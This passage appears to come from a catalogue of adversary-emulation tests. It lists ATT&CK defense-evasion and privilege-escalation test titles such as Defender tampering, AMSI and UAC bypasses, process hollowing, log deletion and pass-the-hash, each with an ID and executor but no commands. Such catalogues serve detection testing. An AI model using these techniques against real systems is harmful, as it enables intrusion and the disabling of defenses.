533 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 49 Tamper with Windows Defender Registry - Powershell a72cfef8-d252-48b3-b292-635d332625c3 powershell
534 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 50 ESXi - Disable Account Lockout Policy via PowerCLI 091a6290-cd29-41cb-81ea-b12f133c66cb powershell
535 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 51 Delete Microsoft Defender ASR Rules - InTune eea0a6c2-84e9-4e8c-a242-ac585d28d0d1 powershell
536 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 52 Delete Microsoft Defender ASR Rules - GPO 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50 powershell
537 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 53 AMSI Bypass - Create AMSIEnable Reg Key 728eca7b-0444-4f6f-ac36-437e3d751dc0 powershell
538 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 54 Disable EventLog-Application Auto Logger Session Via Registry - Cmd 653c6e17-14a2-4849-851d-f1c0cc8ea9ab command_prompt
539 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 55 Disable EventLog-Application Auto Logger Session Via Registry - PowerShell da86f239-9bd3-4e85-92ed-4a94ef111a1c powershell
540 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 56 Disable EventLog-Application ETW Provider Via Registry - Cmd 1cac9b54-810e-495c-8aac-989e0076583b command_prompt
541 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 57 Disable EventLog-Application ETW Provider Via Registry - PowerShell 8f907648-1ebf-4276-b0f0-e2678ca474f0 powershell
542 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 58 Freeze PPL-protected process with EDR-Freeze cbb2573a-a6ad-4c87-aef8-6e175598559b powershell
543 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 59 Disable ASLR Via sysctl parameters - Linux ac333fe1-ce2b-400b-a117-538634427439 bash
544 defense-evasion T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
545 defense-evasion T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
546 defense-evasion T1055.012 Process Injection: Process Hollowing 3 Process Hollowing in Go using CreateProcessW WinAPI c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a powershell
547 defense-evasion T1055.012 Process Injection: Process Hollowing 4 Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012) 94903cc5-d462-498a-b919-b1e5ab155fee powershell
548 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
549 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
550 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
551 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
552 defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
553 defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
554 defense-evasion T1027 Obfuscated Files or Information 7 Obfuscated Command in PowerShell 8b3f4ed6-077b-4bdd-891c-2d237f19410f powershell
555 defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
556 defense-evasion T1027 Obfuscated Files or Information 9 Snake Malware Encrypted crmlog file 7e47ee60-9dd1-4269-9c4f-97953b183268 powershell
557 defense-evasion T1027 Obfuscated Files or Information 10 Execution from Compressed JScript File fad04df1-5229-4185-b016-fb6010cd87ac command_prompt
558 defense-evasion T1564.006 Run Virtual Instance 1 Register Portable Virtualbox c59f246a-34f8-4e4d-9276-c295ef9ba0dd command_prompt
559 defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
560 defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
561 defense-evasion T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
562 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 1 Regsvr32 local COM scriptlet execution 449aa403-6aba-47ce-8a37-247d21ef0306 command_prompt
563 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
564 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
565 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
566 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
567 defense-evasion T1036.003 Masquerading: Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
568 defense-evasion T1036.003 Masquerading: Rename System Utilities 2 Masquerading as FreeBSD or Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
569 defense-evasion T1036.003 Masquerading: Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
570 defense-evasion T1036.003 Masquerading: Rename System Utilities 4 Masquerading - wscript.exe running as svchost.exe 24136435-c91a-4ede-9da1-8b284a1c1a23 command_prompt
571 defense-evasion T1036.003 Masquerading: Rename System Utilities 5 Masquerading - powershell.exe running as taskhostw.exe ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa command_prompt
572 defense-evasion T1036.003 Masquerading: Rename System Utilities 6 Masquerading - non-windows exe running as windows exe bc15c13f-d121-4b1f-8c7d-28d95854d086 powershell
573 defense-evasion T1036.003 Masquerading: Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
574 defense-evasion T1036.003 Masquerading: Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
575 defense-evasion T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
576 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
577 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
578 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
579 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 2 Install root CA on FreeBSD f4568003-1438-44ab-a234-b3252ea7e7a3 sh
580 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 3 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
581 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 4 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
582 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 5 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
583 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 6 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
584 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 7 Add Root Certificate to CurrentUser Certificate Store ca20a3f1-42b5-4e21-ad3f-1049199ec2e0 powershell
585 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
586 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
587 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 sh
588 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe sh
589 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 sh
590 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
591 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
592 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
593 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
594 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
595 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
596 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 1 AWS - CloudTrail Changes 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e sh
597 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 2 Azure - Eventhub Deletion 5e09bed0-7d33-453b-9bf3-caea32bff719 powershell
598 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 3 Office 365 - Exchange Audit Log Disabled 1ee572f3-056c-4632-a7fc-7e7c42b1543c powershell
599 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 4 AWS - Disable CloudTrail Logging Through Event Selectors using Stratus a27418de-bdce-4ebd-b655-38f11142bf0c sh
600 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 5 AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus 22d89a2f-d475-4895-b2d4-68626d49c029 sh
601 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 6 AWS - Remove VPC Flow Logs using Stratus 93c150f5-ad7b-4ee3-8992-df06dec2ac79 sh
602 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 7 AWS - CloudWatch Log Group Deletes 89422c87-b57b-4a04-a8ca-802bb9d06121 sh
603 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 8 AWS CloudWatch Log Stream Deletes 33ca84bc-4259-4943-bd36-4655dc420932 sh
604 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 9 Office 365 - Set Audit Bypass For a Mailbox c9a2f6fe-7197-488c-af6d-10c782121ca6 powershell
605 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 10 GCP - Delete Activity Event Log d56152ec-01d9-42a2-877c-aac1f6ebe8e6 sh
606 defense-evasion T1564.003 Hide Artifacts: Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
607 defense-evasion T1564.003 Hide Artifacts: Hidden Window 2 Headless Browser Accessing Mockbin 0ad9ab92-c48c-4f08-9b20-9633277c4646 command_prompt
608 defense-evasion T1564.003 Hide Artifacts: Hidden Window 3 Hidden Window-Conhost Execution 5510d22f-2595-4911-8456-4d630c978616 powershell
609 defense-evasion T1027.006 HTML Smuggling 1 HTML Smuggling Remote Payload 30cbeda4-08d9-42f1-8685-197fad677734 powershell
610 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - FreeBSD/Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
611 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - FreeBSD/Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
612 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
613 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
614 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
615 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 6 Delete a single file - Windows PowerShell 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 powershell
616 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 7 Delete an entire folder - Windows PowerShell edd779e4-a509-4cba-8dfa-a112543dbfb1 powershell
617 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 8 Delete Filesystem - Linux f3aa95fe-4f10-4485-ad26-abf22a764c52 sh
618 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 9 Delete Prefetch File 36f96049-0ad7-4a5f-8418-460acaeb92fb powershell
619 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 10 Delete TeamViewer Log Files 69f50a5f-967c-4327-a5bb-e1a9a9983785 powershell
620 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 11 Clears Recycle bin via rd f723d13d-48dc-4317-9990-cf43a9ac0bf2 command_prompt
621 defense-evasion T1221 Template Injection 1 WINWORD Remote Template Injection 1489e08a-82c7-44ee-b769-51b72d03521d command_prompt
622 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 1 Binary simply packed by UPX (linux) 11c46cd8-e471-450e-acb8-52a1216ae6a4 sh
623 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 2 Binary packed by UPX, with modified headers (linux) f06197f8-ff46-48c2-a0c6-afc1b50665e1 sh
624 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
625 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
626 defense-evasion T1622 Debugger Evasion 1 Detect a Debugger Presence in the Machine 58bd8c8d-3a1a-4467-a69c-439c75469b07 powershell
627 defense-evasion T1036.006 Masquerading: Space after Filename 1 Space After Filename (Manual) 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
628 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea sh
629 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
630 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
631 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
632 defense-evasion T1027.007 Obfuscated Files or Information: Dynamic API Resolution 1 Dynamic API Resolution-Ninja-syscall 578025d5-faa9-4f6d-8390-aae739d507e1 powershell
633 defense-evasion T1055.015 Process Injection: ListPlanting 1 Process injection ListPlanting 4f3c7502-b111-4dfe-8a6e-529307891a59 powershell
634 defense-evasion T1220 XSL Script Processing 1 MSXSL Bypass using local files ca23bfb2-023f-49c5-8802-e66997de462d command_prompt
635 defense-evasion T1220 XSL Script Processing 2 MSXSL Bypass using remote files a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 command_prompt
636 defense-evasion T1220 XSL Script Processing 3 WMIC bypass using local XSL file 1b237334-3e21-4a0c-8178-b8c996124988 command_prompt
637 defense-evasion T1220 XSL Script Processing 4 WMIC bypass using remote XSL file 7f5be499-33be-4129-a560-66021f379b9b command_prompt
638 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
639 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
640 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 3 Create Windows System File with Attrib f70974c8-c094-4574-b542-2c545af95a32 command_prompt
641 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 4 Create Windows Hidden File with Attrib dadb792e-4358-4d8d-9207-b771faa0daa5 command_prompt
642 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
643 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 6 Hide a Directory b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 sh
644 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
645 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 8 Hide Files Through Registry f650456b-bd49-4bc1-ae9d-271b5b9581e7 command_prompt
646 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 9 Create Windows Hidden File with powershell 7f66d539-4fbe-4cfa-9a56-4a2bf660c58a powershell
647 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 10 Create Windows System File with powershell d380c318-0b34-45cb-9dad-828c11891e43 powershell
648 defense-evasion T1578.001 Modify Cloud Compute Infrastructure: Create Snapshot 1 AWS - Create Snapshot from EBS Volume a3c09662-85bb-4ea8-b15b-6dc8a844e236 sh
649 defense-evasion T1578.001 Modify Cloud Compute Infrastructure: Create Snapshot 2 Azure - Create Snapshot from Managed Disk 89e69b4b-3458-4ec6-b819-b3008debc1bc sh
650 defense-evasion T1578.001 Modify Cloud Compute Infrastructure: Create Snapshot 3 GCP - Create Snapshot from Persistent Disk e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d sh
651 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
652 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
653 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 3 GCP - Create Custom IAM Role 3a159042-69e6-4398-9a69-3308a4841c85 sh
654 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 1 Alternate Data Streams (ADS) 8822c3b0-d9f9-4daf-a043-49f4602364f4 command_prompt
655 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 2 Store file in Alternate Data Stream (ADS) 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 powershell
656 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 3 Create ADS command prompt 17e7637a-ddaf-4a82-8622-377e20de8fdb command_prompt
657 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 4 Create ADS PowerShell 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 powershell
658 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 5 Create Hidden Directory via $index_allocation 3e6791e7-232c-481c-a680-a52f86b83fdf command_prompt
659 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
660 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
661 defense-evasion T1216 Signed Script Proxy Execution 1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 275d963d-3f36-476c-8bef-a2a3960ee6eb command_prompt
662 defense-evasion T1216 Signed Script Proxy Execution 2 manage-bde.wsf Signed Script Command Execution 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a command_prompt
663 defense-evasion T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
664 defense-evasion T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
665 defense-evasion T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
666 defense-evasion T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
667 defense-evasion T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
668 defense-evasion T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
669 defense-evasion T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
670 defense-evasion T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
671 defense-evasion T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
672 defense-evasion T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
673 defense-evasion T1078.003 Valid Accounts: Local Accounts 11 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
674 defense-evasion T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
675 defense-evasion T1078.003 Valid Accounts: Local Accounts 13 Use PsExec to elevate to NT Authority\SYSTEM account 6904235f-0f55-4039-8aed-41c300ff7733 command_prompt
676 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 1 Lolbin Jsc.exe compile javascript to exe 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8 command_prompt
677 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 2 Lolbin Jsc.exe compile javascript to dll 3fc9fea2-871d-414d-8ef6-02e85e322b80 command_prompt
678 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
679 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
680 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
681 privilege-escalation T1055.011 Process Injection: Extra Window Memory Injection 1 Process Injection via Extra Window Memory (EWM) x64 executable 93ca40d2-336c-446d-bcef-87f14d438018 powershell
682 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
683 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
684 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
685 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
686 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
687 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
688 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
689 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
690 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
691 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 10 Scheduled Task ("Ghost Task") via Registry Key Manipulation 704333ca-cc12-4bcf-9916-101844881f54 command_prompt
692 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 11 Scheduled Task Persistence via CompMgmt.msc 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2 command_prompt
693 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 12 Scheduled Task Persistence via Eventviewer.msc 02124c37-767e-4b76-9383-c9fc366d9d4c command_prompt
694 privilege-escalation T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
695 privilege-escalation T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
696 privilege-escalation T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
697 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
698 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
699 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
700 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
701 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
702 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
703 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
704 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
705 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
706 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
707 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
708 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
709 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
710 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
711 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
712 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
713 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
714 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
715 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
